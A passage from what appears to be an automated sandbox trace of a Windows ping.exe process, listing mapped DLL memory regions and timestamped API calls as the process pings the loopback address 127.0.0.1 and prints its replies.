"\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8307 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8308 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 8309 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8310 start_va = 0x7e150000 end_va = 0x7e24ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e150000" filename = "" Region: id = 8311 start_va = 0x5a0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 8312 start_va = 0x5e0000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 8313 start_va = 0x7e278000 end_va = 0x7e27afff entry_point = 0x0 region_type = private name = "private_0x000000007e278000" filename = "" Region: id = 8314 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 8315 start_va = 0x450000 end_va = 0x452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 8316 start_va = 0x620000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 8317 start_va = 0x630000 end_va = 0x632fff entry_point = 0x630000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 8318 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 8319 start_va = 0x6b0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 8320 start_va = 0x7e275000 end_va = 0x7e277fff entry_point = 0x0 region_type = private name = "private_0x000000007e275000" filename = "" Thread: id = 446 os_tid = 0x4d8 [0143.858] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0143.858] __set_app_type (_Type=0x1) [0143.858] __p__fmode () returned 0x76ea1768 [0143.858] __p__commode () returned 0x76ea176c [0143.858] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0143.859] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0143.859] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.861] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.861] _fileno (_File=0x76ea4c28) returned 1 [0143.861] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.861] GetFileType (hFile=0x28) returned 0x2 [0143.861] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed80 | out: lpMode=0x4eed80) returned 0 [0143.861] GetLastError () returned 0x6 [0143.861] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eece4, nSize=0x50 | out: lpBuffer="䤐«") returned 0x0 [0143.861] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0143.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x4eed9c | out: phkResult=0x4eed9c*=0x88) returned 0x0 [0143.864] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x4eed90, lpData=0x4eed98, lpcbData=0x4eed94*=0x4 | out: lpType=0x4eed90*=0x0, lpData=0x4eed98*=0x0, lpcbData=0x4eed94*=0x4) returned 0x2 [0143.864] RegCloseKey (hKey=0x88) returned 0x0 [0143.864] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x4eed60*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4eed9c | out: ppResult=0x4eed9c*=0xabc278*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xab8988*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0143.864] FreeAddrInfoW (pAddrInfo=0xabc278*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xab8988*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0143.864] IcmpCreateFile () returned 0xab6b80 [0143.867] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xabc250 [0143.867] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xac5270 [0143.868] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x4eee98, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0143.869] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="竈¬N┗\x94䰨盪❋") returned 0x14 [0143.870] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.870] _fileno (_File=0x76ea4c28) returned 1 [0143.870] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.870] GetFileType (hFile=0x28) returned 0x2 [0143.870] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0143.870] GetLastError () returned 0x6 [0143.870] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N❋") returned 0x0 [0143.870] _fileno (_File=0x76ea4c28) returned 1 [0143.870] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0143.870] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0143.870] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xac7b00 [0143.870] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xac7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0143.870] _fileno (_File=0x76ea4c28) returned 1 [0143.870] _write (in: _FileHandle=1, _Buf=0xac7b00*, _MaxCharCount=0x14 | out: _Buf=0xac7b00*) returned 20 [0143.870] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.870] _fileno (_File=0x76ea4c28) returned 1 [0143.870] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0143.870] LocalFree (hMem=0xac7b00) returned 0x0 [0143.870] LocalFree (hMem=0xac7ac8) returned 0x0 [0143.870] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="竈¬N▪\x94䰨盪❚") returned 0x18 [0143.871] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.871] _fileno (_File=0x76ea4c28) returned 1 [0143.871] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.871] GetFileType (hFile=0x28) returned 0x2 [0143.871] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0143.871] GetLastError () returned 0x6 [0143.871] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N❚") returned 0x0 [0143.871] _fileno (_File=0x76ea4c28) returned 1 [0143.871] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0143.871] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0143.871] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xabc318 [0143.871] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xabc318, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0143.871] _fileno (_File=0x76ea4c28) returned 1 [0143.871] _write (in: _FileHandle=1, _Buf=0xabc318*, _MaxCharCount=0x18 | out: _Buf=0xabc318*) returned 24 [0143.871] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.871] _fileno (_File=0x76ea4c28) returned 1 [0143.871] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0143.871] LocalFree (hMem=0xabc318) returned 0x0 [0143.871] LocalFree (hMem=0xac7ac8) returned 0x0 [0143.871] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0143.871] IcmpSendEcho2Ex (in: IcmpHandle=0xab6b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xabc250, RequestSize=0x20, RequestOptions=0x4eee0c, ReplyBuffer=0xac5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xac5270) returned 0x1 [0143.872] InetNtopW (in: Family=2, pAddr=0x4eedfc, pStringBuf=0x4eef24, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0143.872] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="笈¬N⛔\x94䰨盪✣") returned 0x16 [0143.872] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.872] _fileno (_File=0x76ea4c28) returned 1 [0143.872] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.872] GetFileType (hFile=0x28) returned 0x2 [0143.872] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0143.872] GetLastError () returned 0x6 [0143.872] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N✣") returned 0x0 [0143.872] _fileno (_File=0x76ea4c28) returned 1 [0143.872] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.872] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0143.873] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xac7b40 [0143.873] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xac7b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0143.873] _fileno (_File=0x76ea4c28) returned 1 [0143.873] _write (in: _FileHandle=1, _Buf=0xac7b40*, _MaxCharCount=0x16 | out: _Buf=0xac7b40*) returned 22 [0143.873] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.873] _fileno (_File=0x76ea4c28) returned 1 [0143.873] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.873] LocalFree (hMem=0xac7b40) returned 0x0 [0143.873] LocalFree (hMem=0xac7b08) returned 0x0 [0143.873] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="笈¬N⛿\x94䰨盪✼") returned 0x9 [0143.873] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.873] _fileno (_File=0x76ea4c28) returned 1 [0143.873] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.873] GetFileType (hFile=0x28) returned 0x2 [0143.873] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0143.873] GetLastError () returned 0x6 [0143.873] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N✼") returned 0x0 [0143.873] _fileno (_File=0x76ea4c28) returned 1 [0143.873] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.873] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.873] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xab8928 [0143.873] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xab8928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0143.873] _fileno (_File=0x76ea4c28) returned 1 [0143.873] _write (in: _FileHandle=1, _Buf=0xab8928*, _MaxCharCount=0x9 | out: _Buf=0xab8928*) returned 9 [0143.873] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.873] _fileno (_File=0x76ea4c28) returned 1 [0143.873] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.873] LocalFree (hMem=0xab8928) returned 0x0 [0143.873] LocalFree (hMem=0xac7b08) returned 0x0 [0143.873] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x4eed94, nSize=0x0, Arguments=0x4eed90 | out: lpBuffer="笈¬N➷\x94䰨盪✧") returned 0x9 [0143.873] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.873] _fileno (_File=0x76ea4c28) returned 1 [0143.873] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.873] GetFileType (hFile=0x28) returned 0x2 [0143.873] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed58 | out: lpMode=0x4eed58) returned 0 [0143.873] GetLastError () returned 0x6 [0143.873] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecbc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0143.873] _fileno (_File=0x76ea4c28) returned 1 [0143.874] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.874] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.874] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xab8970 [0143.874] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xab8970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0143.874] _fileno (_File=0x76ea4c28) returned 1 [0143.874] _write (in: _FileHandle=1, _Buf=0xab8970*, _MaxCharCount=0x9 | out: _Buf=0xab8970*) returned 9 [0143.874] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.874] _fileno (_File=0x76ea4c28) returned 1 [0143.874] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.874] LocalFree (hMem=0xab8970) returned 0x0 [0143.874] LocalFree (hMem=0xac7b08) returned 0x0 [0143.874] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="笈¬N⟘\x94䰨盪✨") returned 0x9 [0143.874] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.874] _fileno (_File=0x76ea4c28) returned 1 [0143.874] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.874] GetFileType (hFile=0x28) returned 0x2 [0143.874] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0143.874] GetLastError () returned 0x6 [0143.874] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N✨") returned 0x0 [0143.874] _fileno (_File=0x76ea4c28) returned 1 [0143.874] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0143.874] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.874] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xab8910 [0143.874] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xab8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0143.874] _fileno (_File=0x76ea4c28) returned 1 [0143.874] _write (in: _FileHandle=1, _Buf=0xab8910*, _MaxCharCount=0x9 | out: _Buf=0xab8910*) returned 9 [0143.874] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.874] _fileno (_File=0x76ea4c28) returned 1 [0143.874] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0143.874] LocalFree (hMem=0xab8910) returned 0x0 [0143.874] LocalFree (hMem=0xac7b08) returned 0x0 [0143.874] Sleep (dwMilliseconds=0x3e8) [0144.896] IcmpSendEcho2Ex (in: IcmpHandle=0xab6b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xabc250, RequestSize=0x20, RequestOptions=0x4eee0c, ReplyBuffer=0xac5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xac5270) returned 0x1 [0144.897] InetNtopW (in: Family=2, pAddr=0x4eedfc, pStringBuf=0x4eef24, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0144.897] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="羠¬N⛔\x94䰨盪✣") returned 0x16 [0144.897] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0144.897] _fileno (_File=0x76ea4c28) returned 1 [0144.897] _get_osfhandle (_FileHandle=1) returned 0x28 [0144.897] GetFileType (hFile=0x28) returned 0x2 [0144.897] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0144.897] GetLastError () returned 0x6 [0144.897] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N✣") returned 0x0 [0144.897] _fileno (_File=0x76ea4c28) returned 1 [0144.897] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0144.898] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.898] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xac7fd8 [0144.898] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xac7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0144.898] _fileno (_File=0x76ea4c28) returned 1 [0144.898] _write (in: _FileHandle=1, _Buf=0xac7fd8*, _MaxCharCount=0x16 | out: _Buf=0xac7fd8*) returned 22 [0144.898] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0144.898] _fileno (_File=0x76ea4c28) returned 1 [0144.898] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0144.898] LocalFree (hMem=0xac7fd8) returned 0x0 [0144.898] LocalFree (hMem=0xac7fa0) returned 0x0 [0144.898] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="羠¬N⛿\x94䰨盪✼") returned 0x9 [0144.898] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0144.898] _fileno (_File=0x76ea4c28) returned 1 [0144.898] _get_osfhandle (_FileHandle=1) returned 0x28 [0144.898] GetFileType (hFile=0x28) returned 0x2 [0144.898] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0144.898] GetLastError () returned 0x6 [0144.898] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N✼") returned 0x0 [0144.898] _fileno (_File=0x76ea4c28) returned 1 [0144.898] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0144.898] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0144.898] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xab8910 [0144.898] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xab8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0144.898] _fileno (_File=0x76ea4c28) returned 1 [0144.898] _write (in: _FileHandle=1, _Buf=0xab8910*, _MaxCharCount=0x9 | out: _Buf=0xab8910*) returned 9 [0144.898] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0144.898] _fileno (_File=0x76ea4c28) returned 1 [0144.898] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0144.898] LocalFree (hMem=0xab8910) returned 0x0 [0144.898] LocalFree (hMem=0xac7fa0) returned 0x0 [0144.898] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x4eed94, nSize=0x0, Arguments=0x4eed90 | out: lpBuffer="羠¬N➷\x94䰨盪✧") returned 0x9 [0144.899] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0144.899] _fileno (_File=0x76ea4c28) returned 1 [0144.899] _get_osfhandle (_FileHandle=1) returned 0x28 [0144.899] GetFileType (hFile=0x28) returned 0x2 [0144.899] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed58 | out: lpMode=0x4eed58) returned 0 [0144.899] GetLastError () returned 0x6 [0144.899] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecbc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0144.899] _fileno (_File=0x76ea4c28) returned 1 [0144.899] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0144.899] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0144.899] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xab8910 [0144.899] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xab8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0144.899] _fileno (_File=0x76ea4c28) returned 1 [0144.899] _write (in: _FileHandle=1, _Buf=0xab8910*, _MaxCharCount=0x9 | out: _Buf=0xab8910*) returned 9 [0144.899] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0144.899] _fileno (_File=0x76ea4c28) returned 1 [0144.899] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0144.899] LocalFree (hMem=0xab8910) returned 0x0 [0144.899] LocalFree (hMem=0xac7fa0) returned 0x0 [0144.899] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x4eed90, nSize=0x0, Arguments=0x4eed8c | out: lpBuffer="羠¬N⟘\x94䰨盪✨") returned 0x9 [0144.899] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0144.899] _fileno (_File=0x76ea4c28) returned 1 [0144.899] _get_osfhandle (_FileHandle=1) returned 0x28 [0144.899] GetFileType (hFile=0x28) returned 0x2 [0144.899] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x4eed54 | out: lpMode=0x4eed54) returned 0 [0144.899] GetLastError () returned 0x6 [0144.899] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x4eecb8, nSize=0x50 | out: lpBuffer="N✨") returned 0x0 [0144.899] _fileno (_File=0x76ea4c28) returned 1 [0144.899] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0144.899] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0144.899] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xab8910 [0144.899] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xab8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0144.899] _fileno (_File=0x76ea4c28) returned 1 [0144.899] _write (in: _FileHandle=1, _Buf=0xab8910*, _MaxCharCount=0x9 | out: _Buf=0xab8910*) returned 9 [0144.899] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0144.899] _fileno (_File=0x76ea4c28) returned 1 [0144.899] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0144.899] LocalFree (hMem=0xab8910) returned 0x0 [0144.899] LocalFree (hMem=0xac7fa0) returned 0x0 [0144.899] Sleep (dwMilliseconds=0x3e8) [0145.915] IcmpSendEcho2Ex (in: IcmpHandle=0xab6b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xabc250, RequestSize=0x20, RequestOptions=0x4eee0c, ReplyBuffer=0xac5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xac5270) returned 0x1 [0145.916] InetNtopW (in: Family=2, pAddr=0x4eedfc, pStringBuf=0x4eef24, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0145.916] 